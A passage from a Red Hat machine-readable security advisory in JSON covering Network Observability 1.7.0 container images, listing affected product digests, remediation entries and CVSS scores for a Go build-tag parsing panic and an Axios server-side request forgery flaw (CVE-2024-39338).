"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:b875fece4d49972e278450730f90bb5defa818aa2774dfa0e15d6f36ba50c840_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:268ac72b4a0bf05893cca0924a80ebd2107f3e859329406257da6ce59ec08dfe_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:3a3c70c990bd3a012453857698433d674b98445e55cc9c5c4ed38eea29eb82b1_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:c32c5ec7c6048f652200677c2a9cbde09ed05beeb818e292f21e6a52786b0a02_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:ccf531d1181ccd1c6eb9ec45ea20069aa01b2924242596f25e551d055c9a0e1b_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:349de1a5389f131933bf39235705a4aa8137a8d4be561f66aa2b74f986489fba_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:4f9cdf8c1c22a79d0690b18c363ade514262510f5fbb4062746210005e832134_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:8c5836a79d4f6562ed17db8488422db567f4a920908e1800b770ec04ffa78080_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:9c2c0e0b8f9c061983f48fca9c18d7a496d38fbc4f8b9274d2fef39a5824c40a_ppc64le"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2024:8014"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
"product_ids": [
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:1587047e407a77f7ac1d963cc9bbfdb5c2472554cad8367f0a96a4699528134d_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:7c2c2c0c0c255c1ef1579b63337d35174a330374a7deaff3c3c1e39ff48e89ee_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:bd8b5a7f1f9369c1f6fe3782c79b4145c3467b3f82e083e1eb83d76a8df21fdd_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:c469d89f77d04b257c6bf9814a3782540139e35c83ac73c2e5820c20ec2146fd_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:10d159c57623d2e098b401331de93d8d591b78e133785dea89d9694ee76ded0f_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:46cee52d96fee8b3f5cd151c21e5b886841cff53b4d65cb6264d39acd9c6a7cd_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:b811f8d5b133d9a90f575d23f7a91e184ef8b6d640fb0cd7732f155d40f51c86_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:ccf31db5ef85f57422a16a61a5c6aea883396699e1cc8c0f6043d2fc7eb0b8e9_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:8016c95a9891094692764956dc9df211e8a0f8cdcf14e6682565d4c35325e0bf_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:ae64fda5860fa3cbdd9a81d56924cd32d69fbf67804e16cc2e1e5ca6f786dd8b_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:d36488d180acdca0e6b0fbe8dbe77af3464d5b1fc3efc9440ed130fec5e71ebe_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:e979023e2e93f1ada9e3fd3e1268b39b4ac1fb9fe51357462e2ac7ddc8c49056_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:54a8042443e480f3543527d6121dbbaab57394554282b8f4fc885a1ba2b28844_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:87f4f7757826faf37710a88be3c2917b855088e02acb73f43eb7a77f61d00d45_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:8bb22f295ec8087a7163997588a4af0dce8f838407aa83f8bd09190a2943ad1e_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:b875fece4d49972e278450730f90bb5defa818aa2774dfa0e15d6f36ba50c840_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:268ac72b4a0bf05893cca0924a80ebd2107f3e859329406257da6ce59ec08dfe_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:3a3c70c990bd3a012453857698433d674b98445e55cc9c5c4ed38eea29eb82b1_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:c32c5ec7c6048f652200677c2a9cbde09ed05beeb818e292f21e6a52786b0a02_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:ccf531d1181ccd1c6eb9ec45ea20069aa01b2924242596f25e551d055c9a0e1b_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:349de1a5389f131933bf39235705a4aa8137a8d4be561f66aa2b74f986489fba_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:4f9cdf8c1c22a79d0690b18c363ade514262510f5fbb4062746210005e832134_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:8c5836a79d4f6562ed17db8488422db567f4a920908e1800b770ec04ffa78080_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:9c2c0e0b8f9c061983f48fca9c18d7a496d38fbc4f8b9274d2fef39a5824c40a_ppc64le"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 5.9,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:1587047e407a77f7ac1d963cc9bbfdb5c2472554cad8367f0a96a4699528134d_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:7c2c2c0c0c255c1ef1579b63337d35174a330374a7deaff3c3c1e39ff48e89ee_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:bd8b5a7f1f9369c1f6fe3782c79b4145c3467b3f82e083e1eb83d76a8df21fdd_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:c469d89f77d04b257c6bf9814a3782540139e35c83ac73c2e5820c20ec2146fd_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:10d159c57623d2e098b401331de93d8d591b78e133785dea89d9694ee76ded0f_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:46cee52d96fee8b3f5cd151c21e5b886841cff53b4d65cb6264d39acd9c6a7cd_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:b811f8d5b133d9a90f575d23f7a91e184ef8b6d640fb0cd7732f155d40f51c86_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:ccf31db5ef85f57422a16a61a5c6aea883396699e1cc8c0f6043d2fc7eb0b8e9_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:8016c95a9891094692764956dc9df211e8a0f8cdcf14e6682565d4c35325e0bf_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:ae64fda5860fa3cbdd9a81d56924cd32d69fbf67804e16cc2e1e5ca6f786dd8b_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:d36488d180acdca0e6b0fbe8dbe77af3464d5b1fc3efc9440ed130fec5e71ebe_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:e979023e2e93f1ada9e3fd3e1268b39b4ac1fb9fe51357462e2ac7ddc8c49056_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:54a8042443e480f3543527d6121dbbaab57394554282b8f4fc885a1ba2b28844_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:87f4f7757826faf37710a88be3c2917b855088e02acb73f43eb7a77f61d00d45_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:8bb22f295ec8087a7163997588a4af0dce8f838407aa83f8bd09190a2943ad1e_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:b875fece4d49972e278450730f90bb5defa818aa2774dfa0e15d6f36ba50c840_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:268ac72b4a0bf05893cca0924a80ebd2107f3e859329406257da6ce59ec08dfe_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:3a3c70c990bd3a012453857698433d674b98445e55cc9c5c4ed38eea29eb82b1_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:c32c5ec7c6048f652200677c2a9cbde09ed05beeb818e292f21e6a52786b0a02_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:ccf531d1181ccd1c6eb9ec45ea20069aa01b2924242596f25e551d055c9a0e1b_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:349de1a5389f131933bf39235705a4aa8137a8d4be561f66aa2b74f986489fba_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:4f9cdf8c1c22a79d0690b18c363ade514262510f5fbb4062746210005e832134_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:8c5836a79d4f6562ed17db8488422db567f4a920908e1800b770ec04ffa78080_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:9c2c0e0b8f9c061983f48fca9c18d7a496d38fbc4f8b9274d2fef39a5824c40a_ppc64le"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "go/build/constraint: golang: Calling Parse on a \"// +build\" build tag line with deeply nested expressions can cause a panic due to stack exhaustion"
},
{
"cve": "CVE-2024-39338",
"cwe": {
"id": "CWE-918",
"name": "Server-Side Request Forgery (SSRF)"
},
"discovery_date": "2024-08-13T17:21:32.774718+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2304369"
}
],
"notes": [
{
"category": "description",
"text": "A vulnerability was found in the Axios HTTP Client. It is vulnerable to a server-side request forgery attack (SSRF) caused by unexpected behavior where requests for path-relative URLs get processed as protocol-relative URLs. This flaw allows an attacker to perform arbitrary requests from the server, potentially accessing internal systems or exfiltrating sensitive data.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "axios: axios: Server-Side Request Forgery",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "This vulnerability is rated as IMPORTANT because it can be exploited remotely with low complexity and without user interaction, it poses a significant risk to confidentiality.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:1587047e407a77f7ac1d963cc9bbfdb5c2472554cad8367f0a96a4699528134d_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:7c2c2c0c0c255c1ef1579b63337d35174a330374a7deaff3c3c1e39ff48e89ee_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:bd8b5a7f1f9369c1f6fe3782c79b4145c3467b3f82e083e1eb83d76a8df21fdd_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:c469d89f77d04b257c6bf9814a3782540139e35c83ac73c2e5820c20ec2146fd_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:10d159c57623d2e098b401331de93d8d591b78e133785dea89d9694ee76ded0f_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:46cee52d96fee8b3f5cd151c21e5b886841cff53b4d65cb6264d39acd9c6a7cd_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:b811f8d5b133d9a90f575d23f7a91e184ef8b6d640fb0cd7732f155d40f51c86_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:ccf31db5ef85f57422a16a61a5c6aea883396699e1cc8c0f6043d2fc7eb0b8e9_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:8016c95a9891094692764956dc9df211e8a0f8cdcf14e6682565d4c35325e0bf_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:ae64fda5860fa3cbdd9a81d56924cd32d69fbf67804e16cc2e1e5ca6f786dd8b_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:d36488d180acdca0e6b0fbe8dbe77af3464d5b1fc3efc9440ed130fec5e71ebe_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:e979023e2e93f1ada9e3fd3e1268b39b4ac1fb9fe51357462e2ac7ddc8c49056_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:54a8042443e480f3543527d6121dbbaab57394554282b8f4fc885a1ba2b28844_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:87f4f7757826faf37710a88be3c2917b855088e02acb73f43eb7a77f61d00d45_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:8bb22f295ec8087a7163997588a4af0dce8f838407aa83f8bd09190a2943ad1e_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:b875fece4d49972e278450730f90bb5defa818aa2774dfa0e15d6f36ba50c840_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:268ac72b4a0bf05893cca0924a80ebd2107f3e859329406257da6ce59ec08dfe_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:3a3c70c990bd3a012453857698433d674b98445e55cc9c5c4ed38eea29eb82b1_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:c32c5ec7c6048f652200677c2a9cbde09ed05beeb818e292f21e6a52786b0a02_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:ccf531d1181ccd1c6eb9ec45ea20069aa01b2924242596f25e551d055c9a0e1b_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:349de1a5389f131933bf39235705a4aa8137a8d4be561f66aa2b74f986489fba_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:4f9cdf8c1c22a79d0690b18c363ade514262510f5fbb4062746210005e832134_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:8c5836a79d4f6562ed17db8488422db567f4a920908e1800b770ec04ffa78080_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:9c2c0e0b8f9c061983f48fca9c18d7a496d38fbc4f8b9274d2fef39a5824c40a_ppc64le"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2024-39338"
},
{
"category": "external",
"summary": "RHBZ#2304369",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2304369"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2024-39338",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-39338"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2024-39338",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-39338"
},
{
"category": "external",
"summary": "https://github.com/axios/axios/releases",
"url": "https://github.com/axios/axios/releases"
},
{
"category": "external",
"summary": "https://jeffhacks.com/advisories/2024/06/24/CVE-2024-39338.html",
"url": "https://jeffhacks.com/advisories/2024/06/24/CVE-2024-39338.html"
}
],
"release_date": "2024-08-12T00:00:00+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2024-10-22T01:05:39+00:00",
"details": "For details on how to apply this update, refer to: \n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:1587047e407a77f7ac1d963cc9bbfdb5c2472554cad8367f0a96a4699528134d_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:7c2c2c0c0c255c1ef1579b63337d35174a330374a7deaff3c3c1e39ff48e89ee_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:bd8b5a7f1f9369c1f6fe3782c79b4145c3467b3f82e083e1eb83d76a8df21fdd_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:c469d89f77d04b257c6bf9814a3782540139e35c83ac73c2e5820c20ec2146fd_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:10d159c57623d2e098b401331de93d8d591b78e133785dea89d9694ee76ded0f_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:46cee52d96fee8b3f5cd151c21e5b886841cff53b4d65cb6264d39acd9c6a7cd_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:b811f8d5b133d9a90f575d23f7a91e184ef8b6d640fb0cd7732f155d40f51c86_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:ccf31db5ef85f57422a16a61a5c6aea883396699e1cc8c0f6043d2fc7eb0b8e9_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:8016c95a9891094692764956dc9df211e8a0f8cdcf14e6682565d4c35325e0bf_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:ae64fda5860fa3cbdd9a81d56924cd32d69fbf67804e16cc2e1e5ca6f786dd8b_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:d36488d180acdca0e6b0fbe8dbe77af3464d5b1fc3efc9440ed130fec5e71ebe_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:e979023e2e93f1ada9e3fd3e1268b39b4ac1fb9fe51357462e2ac7ddc8c49056_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:54a8042443e480f3543527d6121dbbaab57394554282b8f4fc885a1ba2b28844_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:87f4f7757826faf37710a88be3c2917b855088e02acb73f43eb7a77f61d00d45_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:8bb22f295ec8087a7163997588a4af0dce8f838407aa83f8bd09190a2943ad1e_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:b875fece4d49972e278450730f90bb5defa818aa2774dfa0e15d6f36ba50c840_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:268ac72b4a0bf05893cca0924a80ebd2107f3e859329406257da6ce59ec08dfe_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:3a3c70c990bd3a012453857698433d674b98445e55cc9c5c4ed38eea29eb82b1_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:c32c5ec7c6048f652200677c2a9cbde09ed05beeb818e292f21e6a52786b0a02_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:ccf531d1181ccd1c6eb9ec45ea20069aa01b2924242596f25e551d055c9a0e1b_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:349de1a5389f131933bf39235705a4aa8137a8d4be561f66aa2b74f986489fba_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:4f9cdf8c1c22a79d0690b18c363ade514262510f5fbb4062746210005e832134_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:8c5836a79d4f6562ed17db8488422db567f4a920908e1800b770ec04ffa78080_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:9c2c0e0b8f9c061983f48fca9c18d7a496d38fbc4f8b9274d2fef39a5824c40a_ppc64le"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2024:8014"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
"product_ids": [
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:1587047e407a77f7ac1d963cc9bbfdb5c2472554cad8367f0a96a4699528134d_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:7c2c2c0c0c255c1ef1579b63337d35174a330374a7deaff3c3c1e39ff48e89ee_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:bd8b5a7f1f9369c1f6fe3782c79b4145c3467b3f82e083e1eb83d76a8df21fdd_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:c469d89f77d04b257c6bf9814a3782540139e35c83ac73c2e5820c20ec2146fd_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:10d159c57623d2e098b401331de93d8d591b78e133785dea89d9694ee76ded0f_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:46cee52d96fee8b3f5cd151c21e5b886841cff53b4d65cb6264d39acd9c6a7cd_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:b811f8d5b133d9a90f575d23f7a91e184ef8b6d640fb0cd7732f155d40f51c86_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:ccf31db5ef85f57422a16a61a5c6aea883396699e1cc8c0f6043d2fc7eb0b8e9_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:8016c95a9891094692764956dc9df211e8a0f8cdcf14e6682565d4c35325e0bf_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:ae64fda5860fa3cbdd9a81d56924cd32d69fbf67804e16cc2e1e5ca6f786dd8b_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:d36488d180acdca0e6b0fbe8dbe77af3464d5b1fc3efc9440ed130fec5e71ebe_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:e979023e2e93f1ada9e3fd3e1268b39b4ac1fb9fe51357462e2ac7ddc8c49056_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:54a8042443e480f3543527d6121dbbaab57394554282b8f4fc885a1ba2b28844_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:87f4f7757826faf37710a88be3c2917b855088e02acb73f43eb7a77f61d00d45_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:8bb22f295ec8087a7163997588a4af0dce8f838407aa83f8bd09190a2943ad1e_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:b875fece4d49972e278450730f90bb5defa818aa2774dfa0e15d6f36ba50c840_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:268ac72b4a0bf05893cca0924a80ebd2107f3e859329406257da6ce59ec08dfe_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:3a3c70c990bd3a012453857698433d674b98445e55cc9c5c4ed38eea29eb82b1_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:c32c5ec7c6048f652200677c2a9cbde09ed05beeb818e292f21e6a52786b0a02_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:ccf531d1181ccd1c6eb9ec45ea20069aa01b2924242596f25e551d055c9a0e1b_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:349de1a5389f131933bf39235705a4aa8137a8d4be561f66aa2b74f986489fba_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:4f9cdf8c1c22a79d0690b18c363ade514262510f5fbb4062746210005e832134_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:8c5836a79d4f6562ed17db8488422db567f4a920908e1800b770ec04ffa78080_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:9c2c0e0b8f9c061983f48fca9c18d7a496d38fbc4f8b9274d2fef39a5824c40a_ppc64le"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
"version": "3.1"
},
"products": [
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:1587047e407a77f7ac1d963cc9bbfdb5c2472554cad8367f0a96a4699528134d_ppc64le",
